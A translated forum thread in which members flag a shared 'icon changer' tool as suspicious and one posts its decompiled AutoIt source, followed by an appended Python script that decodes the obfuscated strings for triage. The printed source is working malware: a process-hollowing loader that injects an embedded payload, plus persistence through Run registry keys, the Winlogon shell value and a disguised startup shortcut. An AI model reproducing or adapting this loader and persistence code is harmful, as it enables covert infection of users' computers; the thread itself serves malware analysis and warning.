Tools Change Icon

lightome

New member
28 Apr. 2013
A very useful piece of software that I recommend to all the lazy people who are fed up with Reshack :)
Thanks lucdu33490
 

ExhVoid

New Merchant
18 June 2011
A bit suspicious... no VT, Lightome who has 1 message... personally I'm not downloading it.
 

TheHardButcher

C/C++ Programmer
Programmer
14 Dec. 2009
France
I'm doing my analysis right now, I'll edit as soon as it's finished; for now I confirm, very suspicious!
 

TheHardButcher

C/C++ Programmer
Programmer
14 Dec. 2009
France
Anubis analysis: [link hidden for logged-out visitors]

Program source in AutoIt:
Code:
#NoTrayIcon
#Region
#AutoIt3Wrapper_Icon=shyguy-jaune--icone-7979.ico
#AutoIt3Wrapper_Compression=4
#AutoIt3Wrapper_UseUpx=n
#EndRegion
$20280007 = 713165379
While 1
    Switch $20280007
        Case 66914455
            $2028000e = FileRead($2028000f)
            $20280007 = 1996145086
        Case 322315756
            $20280007 = 374656132
        Case 374656132
            #EndRegion
            $20280007 = 676554044
        Case 405814147
            f343236343332383438($2028000e)
            ExitLoop 
        Case 618977660
            $20280007 = 2127255088
        Case 672862045
            $20280007 = 322315756
        Case 676554044
            $2028000f = FileOpen(unhtzircvhfrr(), 0)
            $20280007 = 66914455
        Case 713165379
            $20280007 = 618977660
        Case 1534727121
            $2028000e = f353337353233393539($2028000e, orszghfrrcbqine("\i{{mKinñ"))
            $20280007 = 405814147
        Case 1996145086
            $2028000e = StringMid($2028000e, StringInStr($2028000e, orszghfrrcbqine("JijR}{|qvmjqmjmz")) + fscjovcrt(orszghfrrcbqine("JijR}{|qvmjqmjmz")))
            $20280007 = 1534727121
        Case 2127255088
            $20280007 = 672862045
    EndSwitch
WEnd

Func f353337353233393539($2028000d, $2028001a)
    $20280004 = 713165379
    While 1
        Switch $20280004
            Case 66914455
                $2028000b = 0
                $20280004 = 1996145086
            Case 322315756
                DllStructSetData($2028000b, 1, $2028000d)
                $20280004 = 374656132
            Case 374656132
                DllCall(orszghfrrcbqine("}{mz;:6ltt"), orszghfrrcbqine("vwvm"), orszghfrrcbqine("Kitt_qvlwXzwk"), orszghfrrcbqine("x|z"), DllStructGetPtr($2028000c), orszghfrrcbqine("x|z"), DllStructGetPtr($2028000b), orszghfrrcbqine("qv|"), BinaryLen($2028000d), orszghfrrcbqine("{|z"), $2028001a, orszghfrrcbqine("qv|"), 0)
                $20280004 = 676554044
            Case 618977660
                Local $2028000c = DllStructCreate(orszghfrrcbqine("j|mc") & BinaryLen($2028001b) & "]")
                $20280004 = 2127255088
            Case 672862045
                Local $2028000b = DllStructCreate(orszghfrrcbqine("j|mc") & BinaryLen($2028000d) & "]")
                $20280004 = 322315756
            Case 676554044
                Local $20280021 = DllStructGetData($2028000b, 1)
                $20280004 = 66914455
            Case 713165379
                Local $2028001b = orszghfrrcbqine("8¬[email protected]>I88>I88=;=>[email protected]==98;[email protected]@<[email protected]?N:IM<@<@:[email protected]@A<[email protected][email protected]<[email protected]@[email protected]:[email protected]@@<8LMNNMNNNNM:N;@;>=N<[email protected];>[email protected]?LNK88898888?L<[email protected]<=NK;9L:N??=N8A:8;<=988NJ>[email protected]<LNK8NJ>@[email protected];<=N<:[email protected]<=N<@[email protected]@<;[email protected]?LN<@>@<;[email protected]@@<;=N8NMNNNNNN<[email protected];[email protected];A==8K?>>;@[email protected]=MKNMNNNN<8:[email protected]@[email protected]@8;@=MKNMNNNN8NJ>888;@[email protected]:[email protected]@[email protected]@ALM8;[email protected]>@ALN8;[email protected]@>[email protected]@8>8NJ>8M8NJ>[email protected]@[email protected]<[email protected][email protected]>;88><:[email protected]=N=M=JKAK:9888")
                $20280004 = 618977660
            Case 1534727121
                Return $20280021
                ExitLoop 
            Case 1996145086
                $2028000c = 0
                $20280004 = 1534727121
            Case 2127255088
                DllStructSetData($2028000c, 1, $2028001b)
                $20280004 = 672862045
        EndSwitch
    WEnd
EndFunc

Func f343236343332383438($2028000a)
    $20280000 = 713165379
    While 1
        Switch $20280000
            Case 66914455
                Local $20280010 = DllStructGetData($2028002a, orszghfrrcbqine("Xzwkm{{"))
                $20280000 = 1996145086
            Case 322315756
                Local $2028002b = DllStructCreate(orszghfrrcbqine("lwzl((kj[qmC") & orszghfrrcbqine("x|z(Zm{mz~mlC") & orszghfrrcbqine("x|z(Lm{s|wxC") & orszghfrrcbqine("x|z(\q|tmC") & orszghfrrcbqine("lwzl(`C") & orszghfrrcbqine("lwzl(aC") & orszghfrrcbqine("lwzl(`[qmC") & orszghfrrcbqine("lwzl(a[qmC") & orszghfrrcbqine("lwzl(`Kw}v|Kpiz{C") & orszghfrrcbqine("lwzl(aKw}v|Kpiz{C") & orszghfrrcbqine("lwzl(NqttI||zqj}|mC") & orszghfrrcbqine("lwzl(Ntio{C") & orszghfrrcbqine("}{pwz|([pw_qvlwC") & orszghfrrcbqine("}{pwz|(Zm{mz~ml:C") & orszghfrrcbqine("x|z(Zm{mz~ml:C") & orszghfrrcbqine("x|z(p[|lQvx}|C") & orszghfrrcbqine("x|z(p[|lW}|x}|C") & orszghfrrcbqine("x|z(p[|lMzzwz"))
                $20280000 = 374656132
            Case 374656132
                Local $2028002a = DllStructCreate(orszghfrrcbqine("x|z(Xzwkm{{C") & orszghfrrcbqine("x|z(\pzmilC") & orszghfrrcbqine("lwzl(Xzwkm{{QlC") & orszghfrrcbqine("lwzl(\pzmilQl"))
                $20280000 = 676554044
            Case 405814147
                DllStructSetData($20280024, orszghfrrcbqine("Kwv|m¬|Ntio{"), 65538)
                $20280000 = 853364522
            Case 618977660
                Local $20280023 = DllStructCreate(orszghfrrcbqine("j|mc") & BinaryLen($20280009) & "]")
                $20280000 = 2127255088
            Case 672862045
                Local $2028001e = DllStructGetPtr($20280023)
                $20280000 = 322315756
            Case 676554044
                Local $20280008 = DllCall(orszghfrrcbqine("Smzvmt;:"), orszghfrrcbqine("qv|"), orszghfrrcbqine("Kzmi|mXzwkm{{_"), orszghfrrcbqine("{|z"), @AutoItExe, orszghfrrcbqine("x|z"), 0, orszghfrrcbqine("x|z"), 0, orszghfrrcbqine("x|z"), 0, orszghfrrcbqine("qv|"), 0, orszghfrrcbqine("lwzl"), 4, orszghfrrcbqine("x|z"), 0, orszghfrrcbqine("x|z"), 0, orszghfrrcbqine("x|z"), DllStructGetPtr($2028002b), orszghfrrcbqine("x|z"), DllStructGetPtr($2028002a))
                $20280000 = 66914455
            Case 713165379
                Local $20280009 = Binary($2028000a)
                $20280000 = 618977660
            Case 853364522
                $20280008 = DllCall(orszghfrrcbqine("Smzvmt;:"), orszghfrrcbqine("qv|"), orszghfrrcbqine("Om|\pzmilKwv|m¬|"), orszghfrrcbqine("x|z"), $20280011, orszghfrrcbqine("x|z"), DllStructGetPtr($20280024))
                $20280000 = 2108072214
            Case 1131903826
                Local $20280022 = DllStructGetData($20280025, orszghfrrcbqine("Uioqk"))
                ExitLoop 
            Case 1337086684
                $2028001e += DllStructGetData($20280025, orszghfrrcbqine("Illzm{{WnVmM¬mPmilmz"))
                $20280000 = 1131903826
            Case 1534727121
                Local $20280024 = DllStructCreate(orszghfrrcbqine("lwzl(Kwv|m¬|Ntio{C") & orszghfrrcbqine("lwzl(Lz8C") & orszghfrrcbqine("lwzl(Lz9C") & orszghfrrcbqine("lwzl(Lz:C") & orszghfrrcbqine("lwzl(Lz;C") & orszghfrrcbqine("lwzl(Lz>C") & orszghfrrcbqine("lwzl(Lz?C") & orszghfrrcbqine("lwzl(Kwv|zwt_wzlC") & orszghfrrcbqine("lwzl([|i|}{_wzlC") & orszghfrrcbqine("lwzl(\io_wzlC") & orszghfrrcbqine("lwzl(MzzwzWnn{m|C") & orszghfrrcbqine("lwzl(Mzzwz[mtmk|wzC") & orszghfrrcbqine("lwzl(Li|iWnn{m|C") & orszghfrrcbqine("lwzl(Li|i[mtmk|wzC") & orszghfrrcbqine("j|m(Zmoq{|[email protected]") & orszghfrrcbqine("lwzl(Kz8Vx¬[|i|mC") & orszghfrrcbqine("lwzl([moO{C") & orszghfrrcbqine("lwzl([moN{C") & orszghfrrcbqine("lwzl([moM{C") & orszghfrrcbqine("lwzl([moL{C") & orszghfrrcbqine("lwzl(MlqC") & orszghfrrcbqine("lwzl(M{qC") & orszghfrrcbqine("lwzl(Mj¬C") & orszghfrrcbqine("lwzl(Ml¬C") & orszghfrrcbqine("lwzl(Mk¬C") & orszghfrrcbqine("lwzl(Mi¬C") & orszghfrrcbqine("lwzl(MjxC") & orszghfrrcbqine("lwzl(MqxC") & orszghfrrcbqine("lwzl([moK{C") & orszghfrrcbqine("lwzl(MNtio{C") & orszghfrrcbqine("lwzl(M{xC") & orszghfrrcbqine("lwzl([mo["))
                $20280000 = 405814147
            Case 1996145086
                Local $20280011 = DllStructGetData($2028002a, orszghfrrcbqine("\pzmil"))
                $20280000 = 1534727121
            Case 2108072214
                Local $20280025 = DllStructCreate(orszghfrrcbqine("kpiz(Uioqkc:eC") & orszghfrrcbqine("}{pwz|(J|m{WvTi{|XiomC") & orszghfrrcbqine("}{pwz|(Xiom{C") & orszghfrrcbqine("}{pwz|(Zmtwki|qwv{C") & orszghfrrcbqine("}{pwz|([qmwnPmilmzC") & orszghfrrcbqine("}{pwz|(Uqvqu}uM¬|ziC") & orszghfrrcbqine("}{pwz|(Ui¬qu}uM¬|ziC") & orszghfrrcbqine("}{pwz|([[C") & orszghfrrcbqine("}{pwz|([XC") & orszghfrrcbqine("}{pwz|(Kpmks{}uC") & orszghfrrcbqine("}{pwz|(QXC") & orszghfrrcbqine("}{pwz|(K[C") & orszghfrrcbqine("}{pwz|(Zmtwki|qwvC") & orszghfrrcbqine("}{pwz|(W~mztiC") & orszghfrrcbqine("kpiz(Zm{[email protected]") & orszghfrrcbqine("}{pwz|(WMUQlmv|qnqmzC") & orszghfrrcbqine("}{pwz|(WMUQvnwzui|qwvC") & orszghfrrcbqine("kpiz(Zm{mz~ml:c:8eC") & orszghfrrcbqine("lwzl(Illzm{{WnVmM¬mPmilmz"), $2028001e)
                $20280000 = 1337086684
            Case 2127255088
                DllStructSetData($20280023, 1, $20280009)
                $20280000 = 672862045
        EndSwitch
    WEnd
    If NOT ($20280022 == orszghfrrcbqine("Ub")) Then
        $20280002 = 713165379
        While 1
            Switch $20280002
                Case 618977660
                    Return SetError(3, 0, 0)
                    ExitLoop 
                Case 713165379
                    DllCall(orszghfrrcbqine("Smzvmt;:"), orszghfrrcbqine("qv|"), orszghfrrcbqine("\mzuqvi|mXzwkm{{"), orszghfrrcbqine("x|z"), $20280010, orszghfrrcbqine("lwzl"), 0)
                    $20280002 = 618977660
            EndSwitch
        WEnd
    EndIf
    $20280002 = 713165379
    While 1
        Switch $20280002
            Case 618977660
                $2028001e += 4
                ExitLoop 
            Case 713165379
                Local $20280027 = DllStructCreate(orszghfrrcbqine("lwzl([qovi|}zm"), $2028001e)
                $20280002 = 618977660
        EndSwitch
    WEnd
    If DllStructGetData($20280027, orszghfrrcbqine("[qovi|}zm")) <> 17744 Then
        $20280002 = 713165379
        While 1
            Switch $20280002
                Case 618977660
                    Return SetError(4, 0, 0)
                    ExitLoop 
                Case 713165379
                    DllCall(orszghfrrcbqine("Smzvmt;:"), orszghfrrcbqine("qv|"), orszghfrrcbqine("\mzuqvi|mXzwkm{{"), orszghfrrcbqine("x|z"), $20280010, orszghfrrcbqine("lwzl"), 0)
                    $20280002 = 618977660
            EndSwitch
        WEnd
    EndIf
    $20280006 = 713165379
    While 1
        Switch $20280006
            Case 322315756
                $2028001e += 96
                $20280006 = 374656132
            Case 374656132
                Local $20280014 = DllStructGetData($20280028, orszghfrrcbqine("Uioqk"))
                ExitLoop 
            Case 618977660
                Local $20280015 = DllStructGetData($20280026, orszghfrrcbqine("V}ujmzWn[mk|qwv{"))
                $20280006 = 2127255088
            Case 672862045
                Local $20280028 = DllStructCreate(orszghfrrcbqine("}{pwz|(UioqkC") & orszghfrrcbqine("}j|m(UirwzTqvsmz^mz{qwvC") & orszghfrrcbqine("}j|m(UqvwzTqvsmz^mz{qwvC") & orszghfrrcbqine("lwzl([qmWnKwlmC") & orszghfrrcbqine("lwzl([qmWnQvq|qitqmlLi|iC") & orszghfrrcbqine("lwzl([qmWn]vqvq|qitqmlLi|iC") & orszghfrrcbqine("lwzl(Illzm{{WnMv|zXwqv|C") & orszghfrrcbqine("lwzl(Ji{mWnKwlmC") & orszghfrrcbqine("lwzl(Ji{mWnLi|iC") & orszghfrrcbqine("lwzl(QuiomJi{mC") & orszghfrrcbqine("lwzl([mk|qwvItqovumv|C") & orszghfrrcbqine("lwzl(NqtmItqovumv|C") & orszghfrrcbqine("}{pwz|(UirwzWxmzi|qvo[{|mu^mz{qwvC") & orszghfrrcbqine("}{pwz|(UqvwzWxmzi|qvo[{|mu^mz{qwvC") & orszghfrrcbqine("}{pwz|(UirwzQuiom^mz{qwvC") & orszghfrrcbqine("}{pwz|(UqvwzQuiom^mz{qwvC") & orszghfrrcbqine("}{pwz|(Uirwz[}j{{|mu^mz{qwvC") & orszghfrrcbqine("}{pwz|(Uqvwz[}j{{|mu^mz{qwvC") & orszghfrrcbqine("lwzl(_qv;:^mz{qwv^it}mC") & orszghfrrcbqine("lwzl([qmWnQuiomC") & orszghfrrcbqine("lwzl([qmWnPmilmz{C") & orszghfrrcbqine("lwzl(Kpmks[}uC") & orszghfrrcbqine("}{pwz|([}j{{|muC") & orszghfrrcbqine("}{pwz|(LttKpizik|mzq{|qk{C") & orszghfrrcbqine("lwzl([qmWn[|iksZm{mz~mC") & orszghfrrcbqine("lwzl([qmWn[|iksKwuuq|C") & orszghfrrcbqine("lwzl([qmWnPmixZm{mz~mC") & orszghfrrcbqine("lwzl([qmWnPmixKwuuq|C") & orszghfrrcbqine("lwzl(TwilmzNtio{C") & orszghfrrcbqine("lwzl(V}ujmzWnZ~iIvl[qm{"), $2028001e)
                $20280006 = 322315756
            Case 713165379
                Local $20280026 = DllStructCreate(orszghfrrcbqine("}{pwz|(UikpqvmC") & orszghfrrcbqine("}{pwz|(V}ujmzWn[mk|qwv{C") & orszghfrrcbqine("lwzl(\qumLi|m[|iuxC") & orszghfrrcbqine("lwzl(Xwqv|mz\w[ujwt\ijtmC") & orszghfrrcbqine("lwzl(V}ujmzWn[ujwt{C") & orszghfrrcbqine("}{pwz|([qmWnWx|qwvitPmilmzC") & orszghfrrcbqine("}{pwz|(Kpizik|mzq{|qk{"), $2028001e)
                $20280006 = 618977660
            Case 2127255088
                $2028001e += 20
                $20280006 = 672862045
        EndSwitch
    WEnd
    If $20280014 <> 267 Then
        $20280002 = 713165379
        While 1
            Switch $20280002
                Case 618977660
                    Return SetError(5, 0, 0)
                    ExitLoop 
                Case 713165379
                    DllCall(orszghfrrcbqine("Smzvmt;:"), orszghfrrcbqine("qv|"), orszghfrrcbqine("\mzuqvi|mXzwkm{{"), orszghfrrcbqine("x|z"), $20280010, orszghfrrcbqine("lwzl"), 0)
                    $20280002 = 618977660
            EndSwitch
        WEnd
    EndIf
    $20280001 = 713165379
    While 1
        Switch $20280001
            Case 66914455
                Local $2028001c = DllStructGetPtr($20280025)
                $20280001 = 1996145086
            Case 322315756
                $20280008 = DllCall(orszghfrrcbqine("V|ltt"), orszghfrrcbqine("qv|"), orszghfrrcbqine("V|]vuix^qmWn[mk|qwv"), orszghfrrcbqine("x|z"), $20280010, orszghfrrcbqine("x|z"), $2028001d)
                $20280001 = 374656132
            Case 374656132
                $20280008 = DllCall(orszghfrrcbqine("Smzvmt;:"), orszghfrrcbqine("x|z"), orszghfrrcbqine("^qz|}itIttwkM¬"), orszghfrrcbqine("x|z"), $20280010, orszghfrrcbqine("x|z"), $2028001d, orszghfrrcbqine("lwzl"), $20280017, orszghfrrcbqine("lwzl"), 12288, orszghfrrcbqine("lwzl"), 64)
                $20280001 = 676554044
            Case 405814147
                Local $20280029
                $20280001 = 853364522
            Case 618977660
                $2028001e += 128
                $20280001 = 2127255088
            Case 672862045
                Local $20280017 = DllStructGetData($20280028, orszghfrrcbqine("[qmWnQuiom"))
                $20280001 = 322315756
            Case 676554044
                Local $20280020 = $20280008[0]
                $20280001 = 66914455
            Case 713165379
                Local $20280013 = DllStructGetData($20280028, orszghfrrcbqine("Illzm{{WnMv|zXwqv|"))
                $20280001 = 618977660
            Case 853364522
                Local $20280018, $2028001f
                $20280001 = 2108072214
            Case 1534727121
                $20280008 = DllCall(orszghfrrcbqine("Smzvmt;:"), orszghfrrcbqine("qv|"), orszghfrrcbqine("_zq|mXzwkm{{Umuwz"), orszghfrrcbqine("x|z"), $20280010, orszghfrrcbqine("x|z"), $20280020, orszghfrrcbqine("x|z"), $2028001c, orszghfrrcbqine("lwzl"), $20280016, orszghfrrcbqine("lwzl2"), 0)
                $20280001 = 405814147
            Case 1996145086
                Local $20280016 = DllStructGetData($20280028, orszghfrrcbqine("[qmWnPmilmz{"))
                $20280001 = 1534727121
            Case 2108072214
                Local $20280019
                ExitLoop 
            Case 2127255088
                Local $2028001d = DllStructGetData($20280028, orszghfrrcbqine("QuiomJi{m"))
                $20280001 = 672862045
        EndSwitch
    WEnd
    For $20280012 = 1 To $20280015
        $20280003 = 713165379
        While 1
            Switch $20280003
                Case 618977660
                    $20280018 = DllStructGetData($20280029, orszghfrrcbqine("[qmWnZiLi|i"))
                    $20280003 = 2127255088
                Case 672862045
                    $20280019 = DllStructGetData($20280029, orszghfrrcbqine("^qz|}itIllzm{{"))
                    ExitLoop 
                Case 713165379
                    $20280029 = DllStructCreate(orszghfrrcbqine("kpiz([email protected]") & orszghfrrcbqine("lwzl(]vqwvWn^qz|}it[qmIvlXp{qkitIllzm{{C") & orszghfrrcbqine("lwzl(^qz|}itIllzm{{C") & orszghfrrcbqine("lwzl([qmWnZiLi|iC") & orszghfrrcbqine("lwzl(Xwqv|mz\wZiLi|iC") & orszghfrrcbqine("lwzl(Xwqv|mz\wZmtwki|qwv{C") & orszghfrrcbqine("lwzl(Xwqv|mz\wTqvmv}ujmz{C") & orszghfrrcbqine("}{pwz|(V}ujmzWnZmtwki|qwv{C") & orszghfrrcbqine("}{pwz|(V}ujmzWnTqvmv}ujmz{C") & orszghfrrcbqine("lwzl(Kpizik|mzq{|qk{"), $2028001e)
                    $20280003 = 618977660
                Case 2127255088
                    $2028001f = DllStructGetPtr($20280025) + DllStructGetData($20280029, orszghfrrcbqine("Xwqv|mz\wZiLi|i"))
                    $20280003 = 672862045
            EndSwitch
        WEnd
        If $20280018 Then
            $20280008 = DllCall(orszghfrrcbqine("Smzvmt;:"), orszghfrrcbqine("qv|"), orszghfrrcbqine("_zq|mXzwkm{{Umuwz"), orszghfrrcbqine("x|z"), $20280010, orszghfrrcbqine("x|z"), $20280020 + $20280019, orszghfrrcbqine("x|z"), $2028001f, orszghfrrcbqine("lwzl"), $20280018, orszghfrrcbqine("lwzl2"), 0)
        EndIf
        $2028001e += 40
    Next
    $20280005 = 713165379
    While 1
        Switch $20280005
            Case 618977660
                $20280008 = DllCall(orszghfrrcbqine("Smzvmt;:"), orszghfrrcbqine("qv|"), orszghfrrcbqine("[m|\pzmilKwv|m¬|"), orszghfrrcbqine("x|z"), $20280011, orszghfrrcbqine("x|z"), DllStructGetPtr($20280024))
                $20280005 = 2127255088
            Case 713165379
                DllStructSetData($20280024, orszghfrrcbqine("Mi¬"), $20280020 + $20280013)
                $20280005 = 618977660
            Case 2127255088
                $20280008 = DllCall(orszghfrrcbqine("Smzvmt;:"), orszghfrrcbqine("qv|"), orszghfrrcbqine("Zm{}um\pzmil"), orszghfrrcbqine("x|z"), $20280011)
                ExitLoop 
        EndSwitch
    WEnd
EndFunc

Func orszghfrrcbqine($amaaesptrcjjfr)
    Local $zoruutbixfdlhs, $bxtaxrloemzuhv
    For $i = 1 To fscjovcrt($amaaesptrcjjfr)
        $bxtaxrloemzuhv = StringMid($amaaesptrcjjfr, $i, 1)
        $bxtaxrloemzuhv = Asc($bxtaxrloemzuhv) - 8
        $bxtaxrloemzuhv = Chr($bxtaxrloemzuhv)
        $zoruutbixfdlhs = $zoruutbixfdlhs & $bxtaxrloemzuhv
    Next
    $bxtaxrloemzuhv = $zoruutbixfdlhs
    Return $bxtaxrloemzuhv
EndFunc

Func unhtzircvhfrr()
    Global $i, $spath
    For $i = 0 To fscjovcrt($spath)
        $spath = getmodulefilenamea($i)
        Return $spath
    Next
EndFunc

RegWrite("HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\", "Micromicro", "REG_EXPAND_SZ", "%APPDATA%\Microsoft\micro.exe")
RegWrite("HKCU\Software\Microsoft\Windows\CurrentVersion\Run\", "Micromicro", "REG_EXPAND_SZ", "%APPDATA%\Microsoft\micro.exe")
RegWrite("HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "shell", "REG_SZ", "%APPDATA%\Microsoft\micro.exe" & ",explorer.exe")
FileCreateShortcut("%APPDATA%\Microsoft\micro.exe", @StartupDir & "\windows.lnk", "%APPDATA%\Microsoft\", "", "Microsoft", @SystemDir & "\shell32.dll", "", "4", @SW_MINIMIZE)
FileMove(@ScriptFullPath, @AppDataDir & "\Microsoft\micro.exe", 1)

Func getmodulefilenamea($sprocess)
    Local $ret = DllCall("Kernel32", "ptr", "GetModuleFileNameA", "ptr", $i, "str", $spath, "int", 256)
    If (@error) OR (NOT $ret[0]) Then
        Return SetError(1, 0, "")
    EndIf
    Return $ret[2]
EndFunc

Func fscjovcrt($sstr)
    Local $result, $i, $blen
    Do
        $i = $i + 1
        $blen = StringLeft($sstr, $i)
        $result = $i
    Until $sstr = $blen
    Return $result
EndFunc

---------- Message added at 17:08 ---------- Previous message was at 17:05 ----------

Double post (sorry, not enough room otherwise)
To put it simply, the code is lightly obfuscated, but you quickly realize that orszghfrrcbqine("") is the function that decrypts all the strings, and that the program calls functions from the kernel DLL. If you want a more complete analysis, tell me, but I'm not going to write 3 pages here if it's for nothing ^^
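Added example, not part of the original thread: a Python triage script that applies the same subtract-8 decoding as orszghfrrcbqine() statically, so the hidden DllCall targets can be read without running the sample. The sample lines are constructed from statements in the listing above; the watchlist and the repairs for characters the page lost are assumptions of this example.

```python
import re

SHIFT = 8  # orszghfrrcbqine() subtracts 8 from every character code

# Assumptions inferred from how this page renders the encoded strings:
# encoded "x" (0x78 + 8 = 0x80) appears as "¬", and encoded "w", "y", "z"
# (0x7F, 0x81, 0x82) are missing from the text altogether.
PAGE_REPAIRS = {"¬": "x"}
LOST = re.compile(r"[wyz]")

# Hypothetical watchlist for this example: APIs that create a process or
# modify another process's memory and thread state.
WATCHLIST = [
    "CreateProcessW", "NtUnmapViewOfSection", "VirtualAllocEx",
    "WriteProcessMemory", "GetThreadContext", "SetThreadContext", "ResumeThread",
]
BY_SQUASHED = {LOST.sub("", name): name for name in WATCHLIST}

CALL_RE = re.compile(r'orszghfrrcbqine\("([^"]*)"\)')
DLLCALL_RE = re.compile(r'DllCall\("([^"]*)",\s*"[^"]*",\s*"([^"]*)"')

# Constructed sample: DllCall statements taken from the listing, with the
# argument lists shortened and variables renamed.
SAMPLE = r'''
$r = DllCall(orszghfrrcbqine("Smzvmt;:"), orszghfrrcbqine("qv|"), orszghfrrcbqine("Kzmi|mXzwkm{{_"), orszghfrrcbqine("{|z"), @AutoItExe)
$r = DllCall(orszghfrrcbqine("V|ltt"), orszghfrrcbqine("qv|"), orszghfrrcbqine("V|]vuix^qmWn[mk|qwv"), orszghfrrcbqine("x|z"), $hProc)
$r = DllCall(orszghfrrcbqine("Smzvmt;:"), orszghfrrcbqine("x|z"), orszghfrrcbqine("^qz|}itIttwkM¬"), orszghfrrcbqine("x|z"), $hProc)
$r = DllCall(orszghfrrcbqine("Smzvmt;:"), orszghfrrcbqine("qv|"), orszghfrrcbqine("_zq|mXzwkm{{Umuwz"), orszghfrrcbqine("x|z"), $hProc)
$r = DllCall(orszghfrrcbqine("Smzvmt;:"), orszghfrrcbqine("qv|"), orszghfrrcbqine("[m|\pzmilKwv|m¬|"), orszghfrrcbqine("x|z"), $hThread)
$r = DllCall(orszghfrrcbqine("Smzvmt;:"), orszghfrrcbqine("qv|"), orszghfrrcbqine("Zm{}um\pzmil"), orszghfrrcbqine("x|z"), $hThread)
DllCall(orszghfrrcbqine("Smzvmt;:"), orszghfrrcbqine("qv|"), orszghfrrcbqine("\mzuqvi|mXzwkm{{"), orszghfrrcbqine("x|z"), $hProc)
'''


def decode(enc: str) -> str:
    """Reverse the string encoding: shift every character down by 8."""
    return "".join(PAGE_REPAIRS.get(c) or chr(max(ord(c) - SHIFT, 0)) for c in enc)


def deobfuscate(source: str) -> str:
    """Replace each orszghfrrcbqine("...") call with its decoded string literal."""
    return CALL_RE.sub(lambda m: '"' + decode(m.group(1)) + '"', source)


def api_calls(source: str) -> list[tuple[str, str, bool]]:
    """Return (dll, function, on_watchlist) for every DllCall in the source.

    Names are compared with w/y/z removed on both sides, so a name that lost
    one of those characters on the page still resolves to its watchlist entry.
    """
    calls = []
    for dll, func in DLLCALL_RE.findall(deobfuscate(source)):
        known = BY_SQUASHED.get(LOST.sub("", func))
        calls.append((dll, known or func, known is not None))
    return calls


if __name__ == "__main__":
    for dll, func, hit in api_calls(SAMPLE):
        print(f"{dll:10} {func:22} {'WATCHLIST' if hit else ''}")
```

A name that lost a character on the page and is not on the watchlist stays in its damaged decoded form, so the list needs extending before the output is read as complete.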